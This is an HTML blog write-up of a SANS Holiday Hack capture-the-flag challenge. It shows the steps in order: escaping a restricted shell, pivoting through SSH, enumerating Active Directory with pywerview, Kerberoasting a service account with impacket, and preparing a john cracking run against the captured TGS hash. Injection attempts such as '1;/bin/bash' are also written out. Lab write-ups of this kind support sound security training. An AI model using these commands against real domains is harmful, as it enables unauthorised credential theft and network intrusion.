&lt;h3&gt;&lt;a class="toc-backref" href="#id37"&gt;Kerberoasting on an Open Fire&lt;/a&gt;&lt;/h3&gt;
&lt;p&gt;We have to recover a secret sleigh research document on the Elf University
network. To gain access, we have to register on &lt;a class="reference external" href="https://register.elfu.org/"&gt;the ElfU portal&lt;/a&gt;.
We put a fake name, surname, and email address, and the protal gives us
credentials:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;ElfU Registration Portal&lt;/p&gt;
&lt;p&gt;New Student Domain Account Creation Successful!&lt;/p&gt;
&lt;p&gt;You can now access the student network grading system by SSH'ing into this
asset using the command below:&lt;/p&gt;
&lt;blockquote&gt;
ssh &lt;a class="reference external" href="mailto:xojpwgcens&amp;#64;grades.elfu.org"&gt;xojpwgcens&amp;#64;grades.elfu.org&lt;/a&gt; -p 2222&lt;/blockquote&gt;
&lt;p&gt;ElfU Domain Username: xojpwgcens&lt;/p&gt;
&lt;p&gt;ElfU Domain Password: Xuuqgefth#&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Great, we can SSH onto the ElfU network. However, we seem to be stuck in a
limited shell:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="go"&gt;===================================================&lt;/span&gt;
&lt;span class="go"&gt;=      Elf University Student Grades Portal       =&lt;/span&gt;
&lt;span class="go"&gt;=          (Reverts Everyday 12am EST)            =&lt;/span&gt;
&lt;span class="go"&gt;===================================================&lt;/span&gt;
&lt;span class="go"&gt;1. Print Current Courses/Grades.&lt;/span&gt;
&lt;span class="go"&gt;e. Exit&lt;/span&gt;
&lt;span class="go"&gt;:&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;We only have two options: &lt;code&gt;1&lt;/code&gt;, to print our grades, and &lt;code&gt;e&lt;/code&gt; to
exit. I tried to break out of this limited shell by inputing malicious data,
such as &lt;code&gt;1;/bin/bash&lt;/code&gt;, &lt;code&gt;${whoami}&lt;/code&gt;, etc. But the right move is
to send &lt;code&gt;Ctrl+D&lt;/code&gt;:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="go"&gt;===================================================&lt;/span&gt;
&lt;span class="go"&gt;=      Elf University Student Grades Portal       =&lt;/span&gt;
&lt;span class="go"&gt;=          (Reverts Everyday 12am EST)            =&lt;/span&gt;
&lt;span class="go"&gt;===================================================&lt;/span&gt;
&lt;span class="go"&gt;1. Print Current Courses/Grades.&lt;/span&gt;
&lt;span class="go"&gt;e. Exit&lt;/span&gt;
&lt;span class="go"&gt;: Traceback (most recent call last):&lt;/span&gt;
&lt;span class="go"&gt;  File &amp;quot;/opt/grading_system&amp;quot;, line 41, in &amp;lt;module&amp;gt;&lt;/span&gt;
&lt;span class="go"&gt;    main()&lt;/span&gt;
&lt;span class="go"&gt;  File &amp;quot;/opt/grading_system&amp;quot;, line 26, in main&lt;/span&gt;
&lt;span class="go"&gt;    a = input(&amp;quot;: &amp;quot;).lower().strip()&lt;/span&gt;
&lt;span class="go"&gt;EOFError&lt;/span&gt;
&lt;span class="go"&gt;&amp;gt;&amp;gt;&amp;gt;&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;We escaped from our limited shell, &lt;code&gt;/opt/grading_system&lt;/code&gt;, and were
dropped in a Python console. We can easily spawn a bash shell using the
following code:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;&amp;gt;&amp;gt;&amp;gt; &lt;/span&gt;&lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="nn"&gt;pty&lt;/span&gt;
&lt;span class="gp"&gt;&amp;gt;&amp;gt;&amp;gt; &lt;/span&gt;&lt;span class="n"&gt;pty&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;spawn&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;/bin/bash&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="go"&gt;xojpwgcens@grades:~$&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Great, now we have a true shell access. Let's modify our login shell from
&lt;code&gt;/opt/grading_system&lt;/code&gt; to &lt;code&gt;/bin/bash&lt;/code&gt; so we don't have to escape
every time we connect:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;xojpwgcens@grades:~$&lt;/span&gt; chsh -s /bin/bash
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Now, let's disconnect and reconnect with the &lt;code&gt;-D&lt;/code&gt; option of SSH, so that
we can use our connection as a proxy to the ElfU network. Combined with a tool
like &lt;code&gt;proxychains&lt;/code&gt;, this will allow us to communicate with the internal
network from our external computer:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;$&lt;/span&gt; % ssh -p &lt;span class="m"&gt;2222&lt;/span&gt; -D &lt;span class="m"&gt;4242&lt;/span&gt; xojpwgcens@grades.elfu.org
&lt;span class="go"&gt;xojpwgcens@grades.elfu.org&amp;#39;s password:&lt;/span&gt;
&lt;span class="gp"&gt;xojpwgcens@grades:~$&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Now, given the name of the objective and the fact that we're told that ElfU
uses a domain, we can venture that there's an Active Directory domain to
compromise. The first step is to find a Domain Controller. DCs often carry
the role of DNS servers, so let's take a look at &lt;code&gt;/etc/resolv.conf&lt;/code&gt; to
see what DNS servers we have configured:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;xojpwgcens@grades:~$&lt;/span&gt; cat /etc/resolv.conf
&lt;span class="go"&gt;search c.holidayhack2021.internal. google.internal.&lt;/span&gt;
&lt;span class="go"&gt;nameserver 10.128.1.53&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;10.128.1.53 seems a good candidate. Let's scan it with &lt;code&gt;nmap&lt;/code&gt;, luckily
installed on the grades.elfu.org server, to confirm that's the case:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;xojpwgcens@grades:~$&lt;/span&gt; nmap -Pn -sV &lt;span class="m"&gt;10&lt;/span&gt;.128.1.53
&lt;span class="go"&gt;Starting Nmap 7.80 ( https://nmap.org ) at 2022-01-04 11:22 UTC&lt;/span&gt;
&lt;span class="go"&gt;Nmap scan report for hhc21-windows-dc.c.holidayhack2021.internal (10.128.1.53)&lt;/span&gt;
&lt;span class="go"&gt;Host is up (0.00057s latency).&lt;/span&gt;
&lt;span class="go"&gt;Not shown: 988 filtered ports&lt;/span&gt;
&lt;span class="go"&gt;PORT     STATE SERVICE       VERSION&lt;/span&gt;
&lt;span class="go"&gt;53/tcp   open  domain?&lt;/span&gt;
&lt;span class="go"&gt;88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2022-01-04 11:22:18Z)&lt;/span&gt;
&lt;span class="go"&gt;135/tcp  open  msrpc         Microsoft Windows RPC&lt;/span&gt;
&lt;span class="go"&gt;139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn&lt;/span&gt;
&lt;span class="go"&gt;389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: elfu.local0., Site: Default-First-Site-Name)&lt;/span&gt;
&lt;span class="go"&gt;445/tcp  open  microsoft-ds?&lt;/span&gt;
&lt;span class="go"&gt;464/tcp  open  kpasswd5?&lt;/span&gt;
&lt;span class="go"&gt;593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0&lt;/span&gt;
&lt;span class="go"&gt;636/tcp  open  tcpwrapped&lt;/span&gt;
&lt;span class="go"&gt;3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: elfu.local0., Site: Default-First-Site-Name)&lt;/span&gt;
&lt;span class="go"&gt;3269/tcp open  tcpwrapped&lt;/span&gt;
&lt;span class="go"&gt;3389/tcp open  ms-wbt-server Microsoft Terminal Services&lt;/span&gt;
&lt;span class="go"&gt;1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :&lt;/span&gt;
&lt;span class="gp"&gt;SF-Port53-TCP:V=7.80%I=7%D=1/4%Time=61D42DEF%P=x86_64-pc-linux-gnu%&lt;/span&gt;r&lt;span class="o"&gt;(&lt;/span&gt;DNSVe
&lt;span class="go"&gt;SF:rsionBindReqTCP,20,&amp;quot;\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\x&lt;/span&gt;
&lt;span class="go"&gt;SF:04bind\0\0\x10\0\x03&amp;quot;);&lt;/span&gt;
&lt;span class="go"&gt;Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows&lt;/span&gt;

&lt;span class="go"&gt;Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .&lt;/span&gt;
&lt;span class="go"&gt;Nmap done: 1 IP address (1 host up) scanned in 146.79 seconds&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Well this definitely looks like a DC for the domain &lt;code&gt;elfu.local&lt;/code&gt;. Let's
try to interrogate it with our user account. To do so, I'm using &lt;a class="reference external" href="https://github.com/the-useless-one/pywerview/"&gt;pywerview&lt;/a&gt;, developped by yours
truly and my dear friend and colleague, &lt;a class="reference external" href="https://github.com/ThePirateWhoSmellsOfSunflowers"&gt;ThePirateWhoSmellsOfSunflowers&lt;/a&gt;.
It's a Python port of most functions of &lt;a class="reference external" href="https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1"&gt;PowerView&lt;/a&gt;,
by PowerShellMafia. I use it all the time during internal assessment. Let's use
the &lt;code&gt;get-netuser&lt;/code&gt; function to get a list of domain users.&lt;/p&gt;
&lt;p&gt;I first configure &lt;code&gt;proxychains&lt;/code&gt; to connect through the SSH connection,
and to use the DC as a DNS server:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;$&lt;/span&gt; tail -n &lt;span class="m"&gt;2&lt;/span&gt; /etc/proxychains.conf
&lt;span class="go"&gt;socks4      127.0.0.1 4242&lt;/span&gt;
&lt;span class="gp"&gt;$&lt;/span&gt; grep &lt;span class="nv"&gt;DNS_SERVER&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt; /usr/lib/proxychains3/proxyresolv
&lt;span class="go"&gt;DNS_SERVER=${PROXYRESOLV_DNS:-10.128.1.53}&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Now we can use &lt;code&gt;pywerview&lt;/code&gt; through our SSH connection:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;$&lt;/span&gt; proxychains pywerview get-netuser -t &lt;span class="m"&gt;10&lt;/span&gt;.128.1.53 -u xojpwgcens -p &lt;span class="s1"&gt;&amp;#39;Xuuqgefth#&amp;#39;&lt;/span&gt;
&lt;span class="go"&gt;ProxyChains-3.1 (http://proxychains.sf.net)&lt;/span&gt;
&lt;span class="go"&gt;|S-chain|-&amp;lt;&amp;gt;-127.0.0.1:4242-&amp;lt;&amp;gt;&amp;lt;&amp;gt;-10.128.1.53:445-&amp;lt;&amp;gt;&amp;lt;&amp;gt;-OK&lt;/span&gt;
&lt;span class="go"&gt;|S-chain|-&amp;lt;&amp;gt;-127.0.0.1:4242-&amp;lt;&amp;gt;&amp;lt;&amp;gt;-10.128.1.53:445-&amp;lt;&amp;gt;&amp;lt;&amp;gt;-OK&lt;/span&gt;
&lt;span class="go"&gt;|S-chain|-&amp;lt;&amp;gt;-127.0.0.1:4242-&amp;lt;&amp;gt;&amp;lt;&amp;gt;-10.128.1.53:389-&amp;lt;&amp;gt;&amp;lt;&amp;gt;-OK&lt;/span&gt;
&lt;span class="go"&gt;objectclass:           top, person, organizationalPerson, user&lt;/span&gt;
&lt;span class="go"&gt;cn:                    hyxtwnyytl&lt;/span&gt;
&lt;span class="go"&gt;distinguishedname:     CN=hyxtwnyytl,CN=Users,DC=elfu,DC=local&lt;/span&gt;
&lt;span class="go"&gt;instancetype:          4&lt;/span&gt;
&lt;span class="go"&gt;whencreated:           2022-01-04 11:31:25+00:00&lt;/span&gt;
&lt;span class="go"&gt;whenchanged:           2022-01-04 11:31:25+00:00&lt;/span&gt;
&lt;span class="go"&gt;displayname:           hyxtwnyytl&lt;/span&gt;
&lt;span class="go"&gt;usncreated:            106185&lt;/span&gt;
&lt;span class="go"&gt;usnchanged:            106189&lt;/span&gt;
&lt;span class="go"&gt;name:                  hyxtwnyytl&lt;/span&gt;
&lt;span class="go"&gt;objectguid:            {bd879bd1-4996-4b85-a596-e7f8343c43f6}&lt;/span&gt;
&lt;span class="go"&gt;useraccountcontrol:    NORMAL_ACCOUNT, DONT_EXPIRE_PASSWORD&lt;/span&gt;
&lt;span class="go"&gt;badpwdcount:           0&lt;/span&gt;
&lt;span class="go"&gt;codepage:              0&lt;/span&gt;
&lt;span class="go"&gt;countrycode:           0&lt;/span&gt;
&lt;span class="go"&gt;badpasswordtime:       1601-01-01 00:00:00+00:00&lt;/span&gt;
&lt;span class="go"&gt;lastlogoff:            1601-01-01 00:00:00+00:00&lt;/span&gt;
&lt;span class="go"&gt;lastlogon:             1601-01-01 00:00:00+00:00&lt;/span&gt;
&lt;span class="go"&gt;pwdlastset:            2022-01-04 11:31:25.370573+00:00&lt;/span&gt;
&lt;span class="go"&gt;primarygroupid:        513&lt;/span&gt;
&lt;span class="go"&gt;objectsid:             S-1-5-21-2037236562-2033616742-1485113978-1575&lt;/span&gt;
&lt;span class="go"&gt;accountexpires:        9999-12-31 23:59:59.999999+00:00&lt;/span&gt;
&lt;span class="go"&gt;logoncount:            0&lt;/span&gt;
&lt;span class="go"&gt;samaccountname:        hyxtwnyytl&lt;/span&gt;
&lt;span class="go"&gt;samaccounttype:        805306368&lt;/span&gt;
&lt;span class="go"&gt;userprincipalname:     hyxtwnyytl@elfu.local&lt;/span&gt;
&lt;span class="go"&gt;objectcategory:        CN=Person,CN=Schema,CN=Configuration,DC=elfu,DC=local&lt;/span&gt;
&lt;span class="go"&gt;dscorepropagationdata: 2022-01-04 11:31:25+00:00, 1601-01-01 00:00:00+00:00&lt;/span&gt;

&lt;span class="go"&gt;[snip]&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;The output is pretty long (lots of other contestants' accounts), so I won't
paste it all. Let's search for an account with a &lt;code&gt;serviceprincipalname&lt;/code&gt;
attribute. Indeed, only users with a configured SPN can be compromised
via &lt;a class="reference external" href="https://book.hacktricks.xyz/windows/active-directory-methodology/kerberoast"&gt;Kerberoasting&lt;/a&gt;.
It's actually an attack we already talked about &lt;a class="reference external" href="/posts/2019/01/14/sans-christmas-challenge-2018/#sans-slingshot-linux-image"&gt;in a previous SANS Christmas
challenge&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;Let's re-run &lt;code&gt;get-netuser&lt;/code&gt; with the &lt;code&gt;--spn&lt;/code&gt; option:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;$&lt;/span&gt; proxychains pywerview get-netuser -t &lt;span class="m"&gt;10&lt;/span&gt;.128.1.53 -u xojpwgcens -p &lt;span class="s1"&gt;&amp;#39;Xuuqgefth#&amp;#39;&lt;/span&gt; --spn
&lt;span class="go"&gt;ProxyChains-3.1 (http://proxychains.sf.net)&lt;/span&gt;
&lt;span class="go"&gt;|S-chain|-&amp;lt;&amp;gt;-127.0.0.1:4242-&amp;lt;&amp;gt;&amp;lt;&amp;gt;-10.128.1.53:445-&amp;lt;&amp;gt;&amp;lt;&amp;gt;-OK&lt;/span&gt;
&lt;span class="go"&gt;|S-chain|-&amp;lt;&amp;gt;-127.0.0.1:4242-&amp;lt;&amp;gt;&amp;lt;&amp;gt;-10.128.1.53:445-&amp;lt;&amp;gt;&amp;lt;&amp;gt;-OK&lt;/span&gt;
&lt;span class="go"&gt;|S-chain|-&amp;lt;&amp;gt;-127.0.0.1:4242-&amp;lt;&amp;gt;&amp;lt;&amp;gt;-10.128.1.53:389-&amp;lt;&amp;gt;&amp;lt;&amp;gt;-OK&lt;/span&gt;
&lt;span class="go"&gt;objectclass:           top, person, organizationalPerson, user&lt;/span&gt;
&lt;span class="go"&gt;cn:                    ElfU Service&lt;/span&gt;
&lt;span class="go"&gt;sn:                    Service&lt;/span&gt;
&lt;span class="go"&gt;givenname:             ElfU&lt;/span&gt;
&lt;span class="go"&gt;distinguishedname:     CN=ElfU Service,CN=Users,DC=elfu,DC=local&lt;/span&gt;
&lt;span class="go"&gt;instancetype:          4&lt;/span&gt;
&lt;span class="go"&gt;whencreated:           2021-10-29 19:25:04+00:00&lt;/span&gt;
&lt;span class="go"&gt;whenchanged:           2022-01-04 10:42:25+00:00&lt;/span&gt;
&lt;span class="go"&gt;displayname:           ElfU Service&lt;/span&gt;
&lt;span class="go"&gt;usncreated:            12772&lt;/span&gt;
&lt;span class="go"&gt;usnchanged:            105830&lt;/span&gt;
&lt;span class="go"&gt;name:                  ElfU Service&lt;/span&gt;
&lt;span class="go"&gt;objectguid:            {4895f1a6-6ecc-4320-a672-c154234c5abc}&lt;/span&gt;
&lt;span class="go"&gt;useraccountcontrol:    NORMAL_ACCOUNT, DONT_EXPIRE_PASSWORD&lt;/span&gt;
&lt;span class="go"&gt;badpwdcount:           0&lt;/span&gt;
&lt;span class="go"&gt;codepage:              0&lt;/span&gt;
&lt;span class="go"&gt;countrycode:           0&lt;/span&gt;
&lt;span class="go"&gt;badpasswordtime:       2022-01-04 10:25:11.359457+00:00&lt;/span&gt;
&lt;span class="go"&gt;lastlogoff:            1601-01-01 00:00:00+00:00&lt;/span&gt;
&lt;span class="go"&gt;lastlogon:             2022-01-04 10:53:18.963085+00:00&lt;/span&gt;
&lt;span class="go"&gt;pwdlastset:            2021-10-29 19:25:04.305279+00:00&lt;/span&gt;
&lt;span class="go"&gt;primarygroupid:        513&lt;/span&gt;
&lt;span class="go"&gt;objectsid:             S-1-5-21-2037236562-2033616742-1485113978-1105&lt;/span&gt;
&lt;span class="go"&gt;accountexpires:        9999-12-31 23:59:59.999999+00:00&lt;/span&gt;
&lt;span class="go"&gt;logoncount:            8&lt;/span&gt;
&lt;span class="go"&gt;samaccountname:        elfu_svc&lt;/span&gt;
&lt;span class="go"&gt;samaccounttype:        805306368&lt;/span&gt;
&lt;span class="go"&gt;userprincipalname:     elfu_svc@elfu.local&lt;/span&gt;
&lt;span class="go"&gt;serviceprincipalname:  ldap/elfu_svc/elfu, ldap/elfu_svc/elfu.local, ldap/elfu_svc.elfu.local/elfu,&lt;/span&gt;
&lt;span class="go"&gt;                       ldap/elfu_svc.elfu.local/elfu.local&lt;/span&gt;
&lt;span class="go"&gt;objectcategory:        CN=Person,CN=Schema,CN=Configuration,DC=elfu,DC=local&lt;/span&gt;
&lt;span class="go"&gt;dscorepropagationdata: 2021-10-29 19:25:04+00:00, 1601-01-01 00:00:00+00:00&lt;/span&gt;
&lt;span class="go"&gt;lastlogontimestamp:    2022-01-04 10:42:25.465366+00:00&lt;/span&gt;

&lt;span class="go"&gt;[snip]&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;I'm leaving out the &lt;code&gt;krbtgt&lt;/code&gt; user, used to manage the Kerberos service.
It has an SPN but its password is fully random and is likely impossible to
crack. However, the &lt;code&gt;elfu_svc&amp;#64;elfu.local&lt;/code&gt; user seems to be a prime target
for Kerberoasting. Let's use &lt;a class="reference external" href="https://github.com/SecureAuthCorp/impacket/blob/master/examples/GetUserSPNs.py"&gt;GetUserSPNs.py&lt;/a&gt;
from &lt;code&gt;impacket&lt;/code&gt; (&lt;code&gt;impacket&lt;/code&gt; is awesome, I love &lt;code&gt;impacket&lt;/code&gt; so
much):&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;$&lt;/span&gt; proxychains GetUserSPNs.py -dc-ip &lt;span class="m"&gt;10&lt;/span&gt;.128.1.53 -request &lt;span class="s1"&gt;&amp;#39;elfu.local/xojpwgcens:Xuuqgefth#&amp;#39;&lt;/span&gt; -outputfile hash_elfu_svc.txt
&lt;span class="go"&gt;ProxyChains-3.1 (http://proxychains.sf.net)&lt;/span&gt;
&lt;span class="go"&gt;Impacket v0.9.25.dev1+20211027.123255.1dad8f7f - Copyright 2021 SecureAuth Corporation&lt;/span&gt;

&lt;span class="go"&gt;|S-chain|-&amp;lt;&amp;gt;-127.0.0.1:4242-&amp;lt;&amp;gt;&amp;lt;&amp;gt;-10.128.1.53:389-&amp;lt;&amp;gt;&amp;lt;&amp;gt;-OK&lt;/span&gt;
&lt;span class="go"&gt;ServicePrincipalName                 Name      MemberOf  PasswordLastSet             LastLogon                   Delegation&lt;/span&gt;
&lt;span class="go"&gt;-----------------------------------  --------  --------  --------------------------  --------------------------  ----------&lt;/span&gt;
&lt;span class="go"&gt;ldap/elfu_svc/elfu                   elfu_svc            2021-10-29 21:25:04.305279  2022-01-04 12:38:20.102998&lt;/span&gt;
&lt;span class="go"&gt;ldap/elfu_svc/elfu.local             elfu_svc            2021-10-29 21:25:04.305279  2022-01-04 12:38:20.102998&lt;/span&gt;
&lt;span class="go"&gt;ldap/elfu_svc.elfu.local/elfu        elfu_svc            2021-10-29 21:25:04.305279  2022-01-04 12:38:20.102998&lt;/span&gt;
&lt;span class="go"&gt;ldap/elfu_svc.elfu.local/elfu.local  elfu_svc            2021-10-29 21:25:04.305279  2022-01-04 12:38:20.102998&lt;/span&gt;



&lt;span class="go"&gt;|S-chain|-&amp;lt;&amp;gt;-127.0.0.1:4242-&amp;lt;&amp;gt;&amp;lt;&amp;gt;-10.128.1.53:88-&amp;lt;&amp;gt;&amp;lt;&amp;gt;-OK&lt;/span&gt;
&lt;span class="go"&gt;|S-chain|-&amp;lt;&amp;gt;-127.0.0.1:4242-&amp;lt;&amp;gt;&amp;lt;&amp;gt;-10.128.1.53:88-&amp;lt;&amp;gt;&amp;lt;&amp;gt;-OK&lt;/span&gt;
&lt;span class="go"&gt;|S-chain|-&amp;lt;&amp;gt;-127.0.0.1:4242-&amp;lt;&amp;gt;&amp;lt;&amp;gt;-10.128.1.53:88-&amp;lt;&amp;gt;&amp;lt;&amp;gt;-OK&lt;/span&gt;
&lt;span class="gp"&gt;$&lt;/span&gt; cat hash_elfu_svc.txt
&lt;span class="gp"&gt;$&lt;/span&gt;krb5tgs&lt;span class="nv"&gt;$23$*&lt;/span&gt;elfu_svc&lt;span class="nv"&gt;$ELFU&lt;/span&gt;.LOCAL&lt;span class="nv"&gt;$elfu&lt;/span&gt;.local/elfu_svc*&lt;span class="nv"&gt;$37&lt;/span&gt;d1d66c6015f8a39a937daf41a098c9&lt;span class="nv"&gt;$05&lt;/span&gt;cf17a586567934e470f9eb5709e9449ebf609cee030f5c1fef2ce1ba98fd66ba7e5a93d37f9d5ac85a05e60cc8e1f25e4773923d7ff92f91aba0275607707bfcb97497ac55be7bd87fe4e782509473809e0e7d92c71f1f7fcc215f65953a449f6e9e020189f04bde63df1ed2c083141f5012fd952fc87d575dfe5dedabd4ef9ecf8acdf95755a01d62e88364e623d8517f59480e156654b00fb9488218f1802ee185227b003d2f4cfcff8bb5b89dab2c0bf852842e839622e9d181d4394ad836543a8ba7f71954fc03a4b9c449d73b50f49ee138c7ca152862970c9602395468c2d6d7f2f4af53def25fa38d9e7fa725ce97a1040b3ac12e7577c36fbf3c1baf715844e180d1c5d76c4db912336d3dc6f412812325099ab8eae5250e9b34f750fc1ef831a544da0f8112a19332dc7413131622d26b69b1a544f5cb190402e2eeaab26da954465d20f7afbc99fc7b6a078db7a5a03a7fe9aa5fba64d4f03f91c5bd9f3ca4f7280754d334db7731b4a33e3bdc32d746be2336f0186388a09f904a68ad3f75c76dcfca437c730980fc6db5cc22d18aac230c3d0130f9b9410f076d4a98ff3937774529543ca71dbfbdd2c3d37c64f5241048c9ac3c294ef74041e18cd2f8e64a349bc1ce9934744f98a735da6e4d7efa0209c7ee2cd853d9a2e778496890c891f6b404d436e8dcb0e985cbe5976899f01e659ae310e45bb3b28b48f5f2f35cf6d0c03763f450f51289d7657299dcdaea79d5633a1e674f97b5a9a91e5bb992f2f6e7250e6932d0510fd2ba2c4cf41f6838b14477a5c68665d00ff19c2afe0ce3c37e916cf7fd4f399b32308d16bd81fcef6a1489b728f96b8a6c07f7b3095deb7fd0a0eaee8114d2c06fe14e4fdee33f92b0e931cfd07d944e5f7b3ba6c50e1f186313986d06627efa3803957ac3138eff4a80674c051e34e17d24075a17f93247315d92446df37a0c112033054df89555ee0fe660b704df30c406b63d441734eb55a87809665d99ad25961a05fa8871d790d5e4124cef657f46b44e8ed5023af4b4be8f9a7d0a81dfdc9543b6e31bf0d79974e689b74a7aaa463fbe3fc796826240e280b0fd3ea5c5ca3ebbc8499196a7ca5ccd2a91e7bcfd60bf102342a3c89fe715e99bf22edf0e62b9ca68b6ba6fc358befdb31f55129fce51364304e809c61cfd5962b735971674e55637cc6b6006174d2a0e1e94c27eecf21a23b18553511b022c7f0e092bc570b0b02d391a7705e641e1648b9d0f922d6a02106dbc1ece729b77d65902896c09467cbb2ed15663ebcde82b2720f8f3dbb61797ae7cb78f77065fbe65ae9579d32a4c602699867c961a39ff73ab3f01da431ce7f73b7651580ffb3f30a280e81d752ae39e4aca990337d59f2b81692d9e275547ab0723833754fbf8aedc0714ada33cc0ce3a1545e7e22b5f239d52bc524996bff62f
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Awesome, we got a hash to crack! Let's fire up &lt;a class="reference external" href="https://github.com/openwall/john"&gt;john&lt;/a&gt;
and get that sweet, sweet password.&lt;/p&gt;
&lt;p&gt;Now, I tried several wordlists from &lt;a class="reference external" href="https://github.com/danielmiessler/SecLists"&gt;SecLists&lt;/a&gt;
with several rules from &lt;code&gt;john&lt;/code&gt;, but it didn't work. If we ask Eve
Snowshoes for advice, here's what she tells us:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Got a hash that won't crack with your wordlist? &lt;a class="reference external" href="https://github.com/NotSoSecure/password_cracking_rules"&gt;OneRuleToRuleThemAll.rule&lt;/a&gt; is a great way
to grow your keyspace.&lt;/p&gt;
&lt;p&gt;Where'd you get your wordlist? &lt;a class="reference external" href="https://github.com/digininja/CeWL"&gt;CeWL&lt;/a&gt;
might generate a great wordlist from the ElfU website, but it will ignore
digits in terms by default.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;If we take a look at &lt;a class="reference external" href="https://register.elfu.org/register"&gt;the ElfU website&lt;/a&gt;,
we see some potential password candidates in the comments:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="c"&gt;&amp;lt;!-- Remember the groups battling to win the karaoke contest earleir this year? I think they were rocks4socks, cookiepella, asnow2021,&lt;/span&gt;
&lt;span class="c"&gt;v0calprezents, Hexatonics, and reindeers4fears. Wow, good times! --&amp;gt;&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;I wouldn't have gotten any of them in a default wordlist, so let's run
&lt;code&gt;cewl&lt;/code&gt;, using &lt;code&gt;--with-numbers&lt;/code&gt; to get candidates with numbers in
them:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;$&lt;/span&gt; cewl --with-numbers -w elfu_wordlist.txt https://register.elfu.org/register
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Now let's add the OneRuleToRuleThemAll.rule file to our &lt;code&gt;john&lt;/code&gt;
configuration:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;$&lt;/span&gt; cp ./OneRuleToRuleThemAll.rule ~/bin/JohnTheRipper/run/rules/
&lt;span class="gp"&gt;$&lt;/span&gt; grep -A &lt;span class="m"&gt;3&lt;/span&gt; List.Rules:OneRuleToRuleThemAll ~/bin/JohnTheRipper/run/john.conf
&lt;span class="go"&gt;[List.Rules:OneRuleToRuleThemAll]&lt;/span&gt;
&lt;span class="go"&gt;!! hashcat logic ON&lt;/span&gt;
&lt;span class="go"&gt;.include &amp;lt;rules/OneRuleToRuleThemAll.rule&amp;gt;&lt;/span&gt;
&lt;span class="go"&gt;!! hashcat logic OFF&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Rules at lines 8210 and 42458 caused some problems, so I just deleted them.
Now we can finally crack our hash:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;$&lt;/span&gt; ~/bin/JohnTheRipper/run/john --format&lt;span class="o"&gt;=&lt;/span&gt;krb5tgs --wordlist&lt;span class="o"&gt;=&lt;/span&gt;./elfu_wordlist.txt --rules&lt;span class="o"&gt;=&lt;/span&gt;OneRuleToRuleThemAll ./hash_elfu_svc.txt
&lt;span class="go"&gt;Using default input encoding: UTF-8&lt;/span&gt;
